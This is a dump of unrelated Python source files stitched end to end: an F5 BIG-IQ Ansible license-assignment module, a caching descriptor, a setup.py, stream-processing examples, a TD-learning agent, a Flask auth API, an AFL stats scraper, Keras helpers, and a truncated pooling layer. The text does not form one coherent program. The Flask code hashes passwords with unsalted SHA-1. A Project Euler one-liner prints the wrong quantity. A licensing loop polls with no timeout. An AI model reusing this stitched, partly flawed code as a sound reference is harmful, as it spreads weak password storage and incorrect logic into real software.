extends_documentation_fragment: f5networks.f5_modules.f5
author:
  - Tim Rupp (@caphrim007)
'''

# Usage examples surfaced by ansible-doc.
EXAMPLES = r'''
- name: Register an unmanaged device
  bigiq_regkey_license_assignment:
    pool: my-regkey-pool
    key: XXXX-XXXX-XXXX-XXXX-XXXX
    device: 1.1.1.1
    managed: no
    device_username: admin
    device_password: secret
    state: present
    provider:
      user: admin
      password: secret
      server: lb.mydomain.com
  delegate_to: localhost

- name: Register a managed device, by name
  bigiq_regkey_license_assignment:
    pool: my-regkey-pool
    key: XXXX-XXXX-XXXX-XXXX-XXXX
    device: bigi1.foo.com
    managed: yes
    state: present
    provider:
      user: admin
      password: secret
      server: lb.mydomain.com
  delegate_to: localhost

- name: Register a managed device, by UUID
  bigiq_regkey_license_assignment:
    pool: my-regkey-pool
    key: XXXX-XXXX-XXXX-XXXX-XXXX
    device: 7141a063-7cf8-423f-9829-9d40599fa3e0
    managed: yes
    state: present
    provider:
      user: admin
      password: secret
      server: lb.mydomain.com
  delegate_to: localhost
'''

# Return-value documentation; this module returns only the common fields.
RETURN = r'''
# only common fields returned
'''

import re
import time
from datetime import datetime

from ansible.module_utils.basic import AnsibleModule

from ..module_utils.bigip import F5RestClient
from ..module_utils.common import (
    F5ModuleError, AnsibleF5Parameters, f5_argument_spec
)
from ..module_utils.icontrol import bigiq_version
from ..module_utils.ipaddress import is_valid_ip
from ..module_utils.teem import send_teem


class Parameters(AnsibleF5Parameters):
    """Base container translating module options to/from BIG-IQ API fields."""

    # API attribute name -> module parameter name.
    api_map = {
        'deviceReference': 'device_reference',
        'deviceAddress': 'device_address',
        'httpsPort': 'device_port'
    }

    # Attributes serialized into API payloads.
    api_attributes = [
        'deviceReference', 'deviceAddress', 'httpsPort', 'managed'
    ]

    # Parameters reported back to the user in the module result.
    returnables = [
        'device_address', 'device_reference', 'device_username', 'device_password',
        'device_port', 'managed'
    ]

    # Parameters compared to decide whether an update is needed.
    updatables = [
        'device_reference', 'device_address', 'device_username', 'device_password',
        'device_port', 'managed'
    ]

    def to_return(self):
        """Return a dict of returnable parameters, filtered of empty values.

        The original wrapped this body in ``try/except Exception: raise``,
        which neither handled nor transformed anything and was removed.
        """
        result = {key: getattr(self, key) for key in self.returnables}
        return self._filter_params(result)


class ApiParameters(Parameters):
    """Parameters as read back from the BIG-IQ API; no extra translation needed."""
    pass


class ModuleParameters(Parameters):
    """Parameters supplied by the user, plus lookups derived via the BIG-IQ API."""

    @property
    def device_password(self):
        # Password for the remote (unmanaged) device, or None if unset.
        if self._values['device_password'] is None:
            return None
        return self._values['device_password']

    @property
    def device_username(self):
        # Username for the remote (unmanaged) device, or None if unset.
        if self._values['device_username'] is None:
            return None
        return self._values['device_username']

    @property
    def device_address(self):
        # Only meaningful when 'device' was supplied as an IP address;
        # implicitly returns None otherwise.
        if self.device_is_address:
            return self._values['device']

    @property
    def device_port(self):
        # HTTPS port of the remote device, coerced to int.
        if self._values['device_port'] is None:
            return None
        return int(self._values['device_port'])

    @property
    def device_is_address(self):
        """True when 'device' parses as an IP address."""
        if is_valid_ip(self.device):
            return True
        return False

    @property
    def device_is_id(self):
        """True when 'device' looks like a UUID (8-4-4-4-12 hex-ish groups)."""
        pattern = r'[A-Za-z0-9]{8}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{12}'
        if re.match(pattern, self.device):
            return True
        return False

    @property
    def device_is_name(self):
        # Fallback classification: anything that is neither an address nor a UUID.
        if not self.device_is_address and not self.device_is_id:
            return True
        return False

    @property
    def device_reference(self):
        """Resolve a managed device to its BIG-IQ device-reference link.

        Returns None for unmanaged devices. Performs a REST lookup; raises
        F5ModuleError when no device matches or the API reports an error.
        """
        if not self.managed:
            return None
        if self.device_is_address:
            # This range lookup is how you do lookups for single IP addresses. Weird.
            filter = "address+eq+'{0}...{0}'".format(self.device)
        elif self.device_is_name:
            filter = "hostname+eq+'{0}'".format(self.device)
        elif self.device_is_id:
            filter = "uuid+eq+'{0}'".format(self.device)
        else:
            raise F5ModuleError(
                "Unknown device format '{0}'".format(self.device)
            )

        uri = "https://{0}:{1}/mgmt/shared/resolver/device-groups/cm-bigip-allBigIpDevices/devices/" \
              "?$filter={2}&$top=1".format(self.client.provider['server'],
                                           self.client.provider['server_port'], filter)
        resp = self.client.api.get(uri)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if resp.status == 200 and response['totalItems'] == 0:
            raise F5ModuleError(
                "No device with the specified address was found."
            )
        elif 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp._content)
        id = response['items'][0]['uuid']
        result = dict(
            link='https://localhost/mgmt/shared/resolver/device-groups/cm-bigip-allBigIpDevices/devices/{0}'.format(id)
        )
        return result

    @property
    def pool_id(self):
        """Look up the regkey pool by name and return its id.

        Raises F5ModuleError when the pool is missing or the API errors.
        """
        filter = "(name%20eq%20'{0}')".format(self.pool)
        uri = 'https://{0}:{1}/mgmt/cm/device/licensing/pool/regkey/licenses?$filter={2}&$top=1'.format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            filter
        )
        resp = self.client.api.get(uri)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if resp.status == 200 and response['totalItems'] == 0:
            raise F5ModuleError(
                "No pool with the specified name was found."
            )
        elif 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp._content)
        return response['items'][0]['id']

    @property
    def member_id(self):
        """Return the license-member id for this device, or None if unassigned.

        The filter key depends on how 'device' was specified (address,
        hostname, or machine UUID).
        """
        if self.device_is_address:
            # This range lookup is how you do lookups for single IP addresses. Weird.
            filter = "deviceAddress+eq+'{0}...{0}'".format(self.device)
        elif self.device_is_name:
            filter = "deviceName+eq+'{0}'".format(self.device)
        elif self.device_is_id:
            filter = "deviceMachineId+eq+'{0}'".format(self.device)
        else:
            raise F5ModuleError(
                "Unknown device format '{0}'".format(self.device)
            )
        uri = 'https://{0}:{1}/mgmt/cm/device/licensing/pool/regkey/licenses/{2}/offerings/{3}/members/' \
              '?$filter={4}'.format(self.client.provider['server'], self.client.provider['server_port'],
                                    self.pool_id, self.key, filter)
        resp = self.client.api.get(uri)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))

        if resp.status == 200 and response['totalItems'] == 0:
            return None
        elif 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp._content)
        result = response['items'][0]['id']
        return result


class Changes(Parameters):
    """Marker base class for the set of parameters that changed."""
    pass


class UsableChanges(Changes):
    """Shapes outbound values so that only fields relevant to the device's
    managed/unmanaged mode are serialized toward the API."""

    @property
    def device_port(self):
        # A port is only sent when licensing an unmanaged device.
        return None if self._values['managed'] else self._values['device_port']

    @property
    def device_username(self):
        # Credentials only apply to unmanaged devices.
        return None if self._values['managed'] else self._values['device_username']

    @property
    def device_password(self):
        # Credentials only apply to unmanaged devices.
        return None if self._values['managed'] else self._values['device_password']

    @property
    def device_reference(self):
        # A device reference only exists for managed devices.
        return self._values['device_reference'] if self._values['managed'] else None

    @property
    def device_address(self):
        # A raw address is only sent for unmanaged devices.
        return None if self._values['managed'] else self._values['device_address']

    @property
    def managed(self):
        # The managed flag itself is never serialized to the API.
        return None


class ReportableChanges(Changes):
    """Changes as reported back to the user; no remapping required here."""
    pass


class Difference(object):
    """Computes per-parameter differences between desired and current state.

    ``compare`` first looks for a same-named attribute on this object
    (allowing custom comparators), then falls back to plain inequality.
    """

    def __init__(self, want, have=None):
        self.want = want
        self.have = have

    def compare(self, param):
        """Return the changed value for *param*, or None when unchanged."""
        if hasattr(self, param):
            return getattr(self, param)
        return self.__default(param)

    def __default(self, param):
        desired = getattr(self.want, param)
        try:
            current = getattr(self.have, param)
        except AttributeError:
            # 'have' is absent or lacks the attribute: report the desired value.
            return desired
        return desired if desired != current else None


class ModuleManager(object):
    """Drives the license-assignment workflow against the BIG-IQ REST API."""

    def __init__(self, *args, **kwargs):
        self.module = kwargs.get('module', None)
        self.client = F5RestClient(**self.module.params)
        # 'want' is the user's desired state; 'have' is lazily left empty here.
        self.want = ModuleParameters(params=self.module.params, client=self.client)
        self.have = ApiParameters()
        self.changes = UsableChanges()

    def _set_changed_options(self):
        """Seed self.changes from every non-None desired parameter."""
        changed = {}
        for key in Parameters.returnables:
            if getattr(self.want, key) is not None:
                changed[key] = getattr(self.want, key)
        if changed:
            self.changes = UsableChanges(params=changed)

    def _update_changed_options(self):
        """Diff want vs. have; populate self.changes and report if anything differs."""
        diff = Difference(self.want, self.have)
        updatables = Parameters.updatables
        changed = dict()
        for k in updatables:
            change = diff.compare(k)
            if change is None:
                continue
            else:
                # dict results merge wholesale; scalars are keyed by parameter.
                if isinstance(change, dict):
                    changed.update(change)
                else:
                    changed[k] = change
        if changed:
            self.changes = UsableChanges(params=changed)
            return True
        return False

    def should_update(self):
        """Return True when a difference between want and have exists."""
        result = self._update_changed_options()
        if result:
            return True
        return False

    def exec_module(self):
        """Entry point: apply the requested state and return the result dict."""
        start = datetime.now().isoformat()
        version = bigiq_version(self.client)
        changed = False
        result = dict()
        state = self.want.state

        if state == "present":
            changed = self.present()
        elif state == "absent":
            changed = self.absent()

        reportable = ReportableChanges(params=self.changes.to_return())
        changes = reportable.to_return()
        result.update(**changes)
        result.update(dict(changed=changed))
        self._announce_deprecations(result)
        # Telemetry reporting (no-op when disabled).
        send_teem(start, self.module, version)
        return result

    def _announce_deprecations(self, result):
        """Surface any queued deprecation warnings through Ansible."""
        warnings = result.pop('__warnings', [])
        for warning in warnings:
            self.module.deprecate(
                msg=warning['msg'],
                version=warning['version']
            )

    def present(self):
        """Ensure the assignment exists; return True when a change was made."""
        if self.exists():
            return False
        return self.create()

    def exists(self):
        """Return True when a license member for this device already exists."""
        if self.want.member_id is None:
            return False
        uri = 'https://{0}:{1}/mgmt/cm/device/licensing/pool/regkey/licenses/{2}/offerings/{3}/members/{4}'.format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            self.want.pool_id,
            self.want.key,
            self.want.member_id
        )
        resp = self.client.api.get(uri)
        if resp.status == 200:
            return True
        return False

    def remove(self):
        """Revoke the license; verifies deletion and waits for convergence."""
        self._set_changed_options()
        if self.module.check_mode:
            return True
        self.remove_from_device()
        if self.exists():
            raise F5ModuleError("Failed to delete the resource.")
        # Artificial sleeping to wait for remote licensing (on BIG-IP) to complete
        #
        # This should be something that BIG-IQ can do natively in 6.1-ish time.
        time.sleep(60)
        return True

    def create(self):
        """Assign the license; unmanaged devices require credentials."""
        self._set_changed_options()
        if not self.want.managed:
            if self.want.device_username is None:
                raise F5ModuleError(
                    "You must specify a 'device_username' when working with unmanaged devices."
                )
            if self.want.device_password is None:
                raise F5ModuleError(
                    "You must specify a 'device_password' when working with unmanaged devices."
                )
        if self.module.check_mode:
            return True
        self.create_on_device()
        if not self.exists():
            raise F5ModuleError(
                "Failed to license the remote device."
            )
        self.wait_for_device_to_be_licensed()

        # Artificial sleeping to wait for remote licensing (on BIG-IP) to complete
        #
        # This should be something that BIG-IQ can do natively in 6.1-ish time.
        time.sleep(60)
        return True

    def create_on_device(self):
        """POST the member payload; attaches credentials for unmanaged devices."""
        params = self.changes.api_params()
        uri = 'https://{0}:{1}/mgmt/cm/device/licensing/pool/regkey/licenses/{2}/offerings/{3}/members/'.format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            self.want.pool_id,
            self.want.key
        )

        if not self.want.managed:
            params['username'] = self.want.device_username
            params['password'] = self.want.device_password

        resp = self.client.api.post(uri, json=params)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))

        if 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp.content)

    def wait_for_device_to_be_licensed(self):
        """Poll until the member reports 'LICENSED' three times in a row.

        NOTE(review): this busy-polls with no sleep between requests and has
        no overall timeout, so a device that never reaches LICENSED would
        loop indefinitely -- confirm whether an upper bound is intended.
        """
        count = 0
        uri = 'https://{0}:{1}/mgmt/cm/device/licensing/pool/regkey/licenses/{2}/offerings/{3}/members/{4}'.format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            self.want.pool_id,
            self.want.key,
            self.want.member_id
        )
        while count < 3:
            resp = self.client.api.get(uri)
            try:
                response = resp.json()
            except ValueError as ex:
                raise F5ModuleError(str(ex))

            if 'code' in response and response['code'] == 400:
                if 'message' in response:
                    raise F5ModuleError(response['message'])
                else:
                    raise F5ModuleError(resp.content)
            if response['status'] == 'LICENSED':
                count += 1
            else:
                count = 0

    def absent(self):
        """Ensure the assignment is gone; return True when a change was made."""
        if self.exists():
            return self.remove()
        return False

    def remove_from_device(self):
        """DELETE the member; unmanaged devices need credentials in the body."""
        uri = 'https://{0}:{1}/mgmt/cm/device/licensing/pool/regkey/licenses/{2}/offerings/{3}/members/{4}'.format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            self.want.pool_id,
            self.want.key,
            self.want.member_id
        )
        params = {}
        if not self.want.managed:
            params.update(self.changes.api_params())
            params['id'] = self.want.member_id
            params['username'] = self.want.device_username
            params['password'] = self.want.device_password
        self.client.api.delete(uri, json=params)


class ArgumentSpec(object):
    """Assembles the AnsibleModule argument spec and conditional requirements."""

    def __init__(self):
        self.supports_check_mode = True
        module_args = dict(
            pool=dict(required=True),
            key=dict(required=True, no_log=True),
            device=dict(required=True),
            managed=dict(type='bool'),
            device_port=dict(type='int', default=443),
            device_username=dict(no_log=True),
            device_password=dict(no_log=True),
            state=dict(default='present', choices=['absent', 'present'])
        )
        # Start from the shared F5 provider options, then layer on the
        # module-specific arguments.
        self.argument_spec = dict(f5_argument_spec)
        self.argument_spec.update(module_args)
        self.required_if = [
            ['state', 'present', ['key', 'managed']],
            ['managed', False, ['device', 'device_username', 'device_password']],
            ['managed', True, ['device']]
        ]


def main():
    """Module entry point: build the spec, run the manager, report results."""
    spec = ArgumentSpec()
    module = AnsibleModule(
        argument_spec=spec.argument_spec,
        supports_check_mode=spec.supports_check_mode,
        required_if=spec.required_if
    )

    try:
        results = ModuleManager(module=module).exec_module()
    except F5ModuleError as ex:
        module.fail_json(msg=str(ex))
    else:
        module.exit_json(**results)


if __name__ == '__main__':
    main()

'''

salt.utils
~~~~~~~~~~


'''



class lazy_property(object):
    '''
    Descriptor that computes an attribute on first access and caches the
    result by replacing itself with the computed value on the instance.

    The wrapped property should represent non-mutable data, since the
    descriptor is bypassed entirely after the first lookup.

    http://stackoverflow.com/a/6849299/564003
    '''

    def __init__(self, fget):
        self.fget = fget
        self.func_name = fget.__name__

    def __get__(self, obj, cls):
        if obj is None:
            # Accessed on the class itself rather than on an instance.
            return None
        result = self.fget(obj)
        # Shadow the descriptor with the computed value on the instance so
        # subsequent lookups never reach __get__ again.
        setattr(obj, self.func_name, result)
        return result

import re
from setuptools import setup


def find_version(filename):
    """Extract the package version string from *filename*.

    Scans for a line of the form ``__version__ = '<version>'`` and returns
    the captured version, or None when no such line exists.
    """
    version_re = re.compile(r"__version__ = '(.*)'")
    # Use a context manager so the file handle is closed promptly; the
    # original iterated a bare open() and leaked the handle.
    with open(filename) as source:
        for line in source:
            match = version_re.match(line)
            if match:
                return match.group(1)
    return None


# Single-source the version from the package itself.
__version__ = find_version('librdflib/__init__.py')

# The README doubles as the PyPI long description.
with open('README.md', 'rt') as f:
    long_description = f.read()

tests_require = ['pytest']
# Package metadata; the entry points register these parsers with rdflib's
# plugin system under the 'rdf.plugins.parser' group.
setup(
    name='librdflib',
    version=__version__,
    description='librdf parser for rdflib',
    long_description=long_description,
    long_description_content_type='text/markdown',
    url='https://github.com/tgbugs/pyontutils/tree/master/librdflib',
    author='Tom Gillespie',
    author_email='tgbugs@gmail.com',
    license='MIT',
    classifiers=[
        'Development Status :: 3 - Alpha',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3',
    ],
    keywords='rdflib librdf rdf parser parsing ttl rdfxml',
    packages=['librdflib'],
    python_requires='>=3',
    tests_require=tests_require,
    install_requires=[
        'rdflib',  # really 5.0.0 if my changes go in but dev < 5
    ],
    extras_require={'dev': ['pytest-cov', 'wheel'],
                    'test': tests_require,
    },
    entry_points={
        'rdf.plugins.parser': [
            'librdfxml = librdflib:libRdfxmlParser',
            'libttl = librdflib:libTurtleParser',
        ],
    },
)

"""This module contains examples of the op() function
where:
op(f,x) returns a stream where x is a stream, and f
is an operator on lists, i.e., f is a function from
a list to a list. These lists are of lists of arbitrary
objects other than streams and agents.

Function f must be stateless, i.e., for any lists u, v:
f(u.extend(v)) = f(u).extend(f(v))
(Stateful functions are given in OpStateful.py with
examples in ExamplesOpWithState.py.)

Let f be a stateless operator on lists and let x be a stream.
If at some point, the value of stream x is a list u then at
that point, the value of stream op(f,x) is the list f(u).
If at a later point, the value of stream x is the list:
u.extend(v) then, at that point the value of stream op(f,x)
is f(u).extend(f(v)).
 
As a specific example, consider the following f():
def f(lst): return [w * w for w in lst]
If at some point in time, the value of x is [3, 7],
then at that point the value of op(f,x) is f([3, 7])
or [9, 49]. If at a later point, the value of x is
[3, 7, 0, 11, 5] then the value of op(f,x) at that point
is f([3, 7, 0, 11, 5]) or [9, 49, 0, 121, 25].

"""
if __name__ == '__main__':
    if __package__ is None:
        # Running as a script: add the parent directory to sys.path so the
        # sibling modules (Agent, ListOperators, PrintFunctions) resolve.
        import sys
        from os import path
        sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )

from Agent import *
from ListOperators import *
from PrintFunctions import print_streams_recent

def example_1():
    """Demonstrate op(f, x): applying stateless list operators to streams.

    Python 2 code: uses print statements, and filter/map return lists.
    """
    print "example_1"
    print "op(f, x): f is a function from a list to a list"
    print "x is a stream \n"

    # FUNCTIONS FROM LIST TO LIST

    # This example uses the following list operators:
    # functions from a list to a list.
    # f, g, h, r


    # Example A: function using list comprehension
    def f(lst): return [w*w for w in lst]

    # Example B: function using filter
    threshold = 6
    def predicate(w):
        return w > threshold
    def g(lst):
        return filter(predicate, lst)

    # Example C: function using map
    # Raise each element of the list to the n-th power.
    n = 3
    def power(w):
        return w**n
    def h(lst):
        return map(power, lst)

    # Example D: function using another list comprehension
    # Discard any element of x that is not a
    # multiple of a parameter n, and divide the
    # elements that are multiples of n by n.
    n = 3
    def r(lst):
        result = []
        for w in lst:
            if w%n == 0: result.append(w/n)
        return result




    # EXAMPLES OF OPERATIONS ON STREAMS

    # The input stream for these examples
    x = Stream('x')

    print 'x is the input stream.'
    print 'a is a stream consisting of the squares of the input'
    print 'b is the stream consisting of values that exceed 6'
    print 'c is the stream consisting of the third powers of the input'
    print 'd is the stream consisting of values that are multiples of 3 divided by 3'
    print 'newa is the same as a. It is defined in a more succinct fashion.'
    print 'newb has squares that exceed 6.'
    print ''

    # The output streams a, b, c, d obtained by
    # applying the list operators f, g, h, r to
    # stream x.
    a = op(f, x)
    b = op(g, x)
    c = op(h, x)
    d = op(r, x)

    # You can also define a function only on streams.
    # You can do this using functools in Python or
    # by simple encapsulation as shown below.
    def F(x): return op(f,x)
    def G(x): return op(g,x)
    newa = F(x)
    newb = G(F(x))
    # The advantage is that F is a function only
    # of streams. So, function composition looks cleaner
    # as in G(F(x))

    # Name the output streams to label the output
    # so that reading the output is easier.
    a.set_name('a')
    newa.set_name('newa')
    b.set_name('b')
    newb.set_name('newb')
    c.set_name('c')
    d.set_name('d')

    # At this point x is the empty stream:
    # its value is []
    x.extend([3, 7])
    # Now the value of x is [3, 7]
    print "FIRST STEP"
    print_streams_recent([x, a, b, c, d, newa, newb])
    print ""

    x.extend([0, 11, 15])
    # Now the value of x is [3, 7, 0, 11, 15]
    print "SECOND STEP"
    print_streams_recent([x, a, b, c, d, newa, newb])

def main():
    """Run the op() demonstration."""
    example_1()

if __name__ == '__main__':
    main()

## Close
### What is the value of the first triangle number to have over five hundred divisors?
# NOTE(review): this prints the MAXIMUM divisor count found among the first
# 999 triangle numbers, not the triangle number itself, so it does not
# answer the question as stated. It also does O(k) trial division per
# triangle number k, which is slow for large inputs. (Python 2 print.)
print max([len(m) for m in map(lambda k: [n for n in range(1,(k+1)) if k%n == 0], [sum(range(n)) for n in range(1,1000)])])
from errors import *
from manager import SchemaManager

import random
from datetime import datetime
from multiprocessing import Pool

import numpy as np
from scipy.optimize import minimize


def worker_func(args):
    """Squared TD-error term for one (game, state) pair.

    *args* is an ``(agent, m, k, r)`` tuple so this function can be used
    with ``multiprocessing.Pool.map``, which passes a single argument.
    """
    agent, m, k, r = args
    residual = (agent.eval_func(m, k, r)
                - agent.eval_func(m, k, agent.rt)
                - agent.temporal_diff_sum(m, k))
    return residual ** 2


def optimized_func_i_der(args):
    """
    The derivative of the optimized function with respect to the
    ith component of the vector r.

    *args* is an ``(agent, r, i)`` tuple (Pool.map passes one argument).
    """
    agent, r, i = args
    total = 0

    for m in range(len(agent.data)):
        # Index of the final board state in game m.
        last_state = agent.data[m].shape[0] - 1

        for k in range(last_state + 1):
            residual = (agent.eval_func(m, k, r)
                        - agent.eval_func(m, k, agent.rt)
                        - agent.temporal_diff_sum(m, k))
            total += residual * 2 * agent.eval_func_der(m, k, r, i)

    return total


def worker_func_der(args):
    """Single derivative term of the squared TD error.

    *args* is an ``(agent, m, k, r, i)`` tuple for use with ``Pool.map``.
    """
    agent, m, k, r, i = args
    residual = (agent.eval_func(m, k, r)
                - agent.eval_func(m, k, agent.rt)
                - agent.temporal_diff_sum(m, k))
    return residual * 2 * agent.eval_func_der(m, k, r, i)


class Agent:
    """TD(lambda)-style learner: fits feature weights to recorded games by
    minimizing squared temporal-difference error with BFGS."""

    # Number of features per board state.
    num_features = 22

    def __init__(self):
        self.lf = 0.2  # Learning factor lambda
        self.data = []  # The features' values for all the games
        self.rewards = []  # Reward values for moving from 1 state to the next
        self.rt = np.array([])  # Current weight vector estimate
        self.max_iter = 50  # BFGS iteration cap

    def set_learning_factor(self, learning_factor):
        # Lambda must lie in [0, 1].
        assert(learning_factor >= 0 and learning_factor <= 1)
        self.lf = learning_factor

    def set_rt(self, rt):
        # The weight vector must have one entry per feature.
        assert(len(rt) == self.num_features)
        self.rt = rt

    def set_iter(self, max_iter):
        self.max_iter = max_iter

    def set_data(self, data):
        """Split each game matrix into feature columns and a reward column.

        A zero row is appended to every game so the terminal state has a
        (zero) reward entry.
        """
        self.data = []
        self.rewards = []

        for game in data:
            game = np.vstack((game, np.zeros(self.num_features + 1)))
            self.data.append(game[:, :-1])
            self.rewards.append(game[:, -1:])

    def eval_func(self, m, k, r):
        """
        The evaluation function value for the set of weights (vector) r
        at the mth game and kth board state """
        return np.dot(r, self.data[m][k])

    def eval_func_der(self, m, k, r, i):
        """
        Find the derivative of the evaluation function with respect
        to the ith component of the vector r
        """
        return self.data[m][k][i]

    def get_reward(self, m, s):
        """
        Get reward for moving from state s to state (s + 1)
        """
        return self.rewards[m][s + 1][0]

    def temporal_diff(self, m, s):
        """
        The temporal difference value for state s to state (s+1) in the mth game
        """
        return (self.get_reward(m, s) + self.eval_func(m, s + 1, self.rt) -
                self.eval_func(m, s, self.rt))

    def temporal_diff_sum(self, m, k):
        """Lambda-discounted sum of temporal differences from state k onward."""
        Nm = self.data[m].shape[0] - 1
        result = 0

        for s in range(k, Nm):
            result += self.lf**(s - k) * self.temporal_diff(m, s)

        return result

    def optimized_func(self, r):
        """Total squared TD error for weights r, computed over a worker pool.

        NOTE(review): a new Pool is created per call and never closed/joined,
        which leaks worker processes across calls -- consider a context
        manager or a shared pool.
        """
        result = 0
        M = len(self.data)
        pool = Pool(processes=4)

        for m in range(M):
            Nm = self.data[m].shape[0] - 1

            k_args = range(Nm + 1)
            self_args = [self] * len(k_args)
            m_args = [m] * len(k_args)
            r_args = [r] * len(k_args)

            result += sum(pool.map(worker_func,
                                   zip(self_args, m_args, k_args, r_args)))

        return result

    def optimized_func_i_der(self, r, i):
        """
        The derivative of the optimized function with respect to the
        ith component of the vector r

        NOTE(review): duplicates the module-level optimized_func_i_der
        (which exists so Pool.map can pickle the call); keep the two in sync.
        """
        result = 0
        M = len(self.data)

        for m in range(M):
            Nm = self.data[m].shape[0] - 1

            for k in range(Nm + 1):
                result += ((self.eval_func(m, k, r) -
                            self.eval_func(m, k, self.rt) -
                            self.temporal_diff_sum(m, k)) * 2 *
                           self.eval_func_der(m, k, r, i))
        return result

    def optimized_func_der(self, r):
        """Full gradient of the objective, one component per worker task.

        NOTE(review): the Pool here is also never closed (see optimized_func).
        """
        p = Pool(processes=4)

        self_args = [self] * len(r)
        i_args = range(len(r))
        r_args = [r] * len(r)

        return np.array(p.map(optimized_func_i_der,
                              zip(self_args, r_args, i_args)))

    def callback(self, r):
        # Progress reporting for scipy.optimize.minimize; relies on
        # self.cur_iter being initialized by compute_next_rt().
        print("Iteration %d completed at %s" %
              (self.cur_iter, datetime.now().strftime("%d/%m/%Y %H:%M:%S")))
        self.cur_iter += 1

    def compute_next_rt(self):
        """Run BFGS from a random integer start point and return the new weights."""
        print("Start computing at %s" %
              (datetime.now().strftime("%d/%m/%Y %H:%M:%S")))

        self.cur_iter = 1

        r0 = np.array([random.randint(-10, 10)
                       for i in range(self.num_features)])

        res = minimize(self.optimized_func, r0, method='BFGS',
                       jac=self.optimized_func_der,
                       options={'maxiter': self.max_iter, 'disp': True},
                       callback=self.callback)

        return res.x

# -*- coding: utf-8 -*-

""""
ProjectName: pydemi
Repo: https://github.com/chrisenytc/pydemi
Copyright (c) 2014 Christopher EnyTC
Licensed under the MIT license.
"""

# Dependencies
import uuid
from api import app
from hashlib import sha1
from flask import request
from flask import jsonify as JSON
from api.models.user import User
from cors import cors


@app.route('/signup', methods=['POST'])
@cors(origin='*', methods=['POST'])
def signup():
    """Create a new user from POSTed form fields and return a JSON message.

    NOTE(review): the password is hashed with bare, unsalted SHA-1, which is
    not suitable for password storage -- prefer bcrypt/PBKDF2/scrypt.
    NOTE(review): sha1() over the raw form value assumes Python 2 byte
    strings; under Python 3 this would need .encode() -- confirm runtime.
    """
    # Create new user
    new_user = User()
    new_user.name = request.form['name']
    new_user.email = request.form['email']
    new_user.password = sha1(request.form['password']).hexdigest()
    # Opaque API token handed back on signin.
    new_user.token = str(uuid.uuid4())
    new_user.save()
    return JSON(message='User created successfully')


@app.route('/signin', methods=['POST'])
@cors(origin='*', methods=['POST'])
def signin():
    """Authenticate by email + password digest; return the user's token and roles."""
    # Return the user data (matched on email plus SHA-1 password digest).
    user_info = User.objects(email=request.form['email'], password=sha1(
        request.form['password']).hexdigest())
    if user_info.count():
        return JSON(token=user_info.get().token, roles=user_info.get().roles)
    else:
        return JSON(message='User not found')

# Two-letter AFL team codes mapped to full club names.
team_mapping = {
    "SY": "Sydney",
    "WB": "Western Bulldogs",
    "WC": "West Coast",
    "HW": "Hawthorn",
    "GE": "Geelong",
    "FR": "Fremantle",
    "RI": "Richmond",
    "CW": "Collingwood",
    "CA": "Carlton",
    "GW": "Greater Western Sydney",
    "AD": "Adelaide",
    "GC": "Gold Coast",
    "ES": "Essendon",
    "ME": "Melbourne",
    "NM": "North Melbourne",
    "PA": "Port Adelaide",
    "BL": "Brisbane Lions",
    "SK": "St Kilda"
}

def get_team_name(code):
    """Return the full team name for a two-letter *code*.

    Unknown codes are returned unchanged, mirroring get_team_code's
    fallback behaviour (the original raised KeyError instead).
    """
    return team_mapping.get(code, code)

def get_team_code(full_name):
    """Return the two-letter code for *full_name*, or the input when unmatched."""
    matches = (code for code, name in team_mapping.items() if name == full_name)
    return next(matches, full_name)

def get_match_description(response):
    """Extract match metadata from an AFL Tables match page.

    *response* is presumably a scrapy Response. The fixed indices into
    ``match_details`` depend on the site's current table layout -- TODO
    confirm against a live page if the scrape breaks.
    """
    # The match header cell spans 5 columns and is centered.
    match_container = response.xpath("//td[@colspan = '5' and @align = 'center']")[0]
    match_details = match_container.xpath(".//text()").extract()
    return {
        "round": match_details[1],
        "venue": match_details[3],
        "date": match_details[6],
        "attendance": match_details[8],
        "homeTeam": response.xpath("(//a[contains(@href, 'teams/')])[1]/text()").extract_first(),
        "awayTeam": response.xpath("(//a[contains(@href, 'teams/')])[2]/text()").extract_first(),
        "homeScore": int(response.xpath("//table[1]/tr[2]/td[5]/b/text()").extract_first()),
        "awayScore": int(response.xpath("//table[1]/tr[3]/td[5]/b/text()").extract_first())
    }

def get_match_urls(response):
    """Yield absolute URLs for every match-stats link on the page."""
    hrefs = response.xpath("//a[contains(@href, 'stats/games/')]/@href").extract()
    for href in hrefs:
        yield response.urljoin(href)
from keras.applications import imagenet_utils
from keras.applications import mobilenet


def dummyPreprocessInput(image):
    """Center pixel values around zero by subtracting 127.5.

    NOTE(review): mutates *image* in place (``-=``) and also returns it, so
    a caller's shared array is modified -- confirm this is intended.
    """
    image -= 127.5
    return image


def getPreprocessFunction(preprocessType):
    """Return the preprocessing callable named by *preprocessType*.

    Supported names: "dummy", "mobilenet", "imagenet". Raises Exception
    for anything else.
    """
    if preprocessType == "dummy":
        return dummyPreprocessInput
    if preprocessType == "mobilenet":
        return mobilenet.preprocess_input
    if preprocessType == "imagenet":
        return imagenet_utils.preprocess_input
    raise Exception(preprocessType + " not supported")

#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'ar'

from layers_basic import LW_Layer, default_data_format
from layers_convolutional import conv_output_length

###############################################
class _LW_Pooling1D(LW_Layer):
    """Shared shape logic for 1D pooling layers (input: batch, steps, channels)."""

    input_dim = 3

    def __init__(self, pool_size=2, strides=None, padding='valid'):
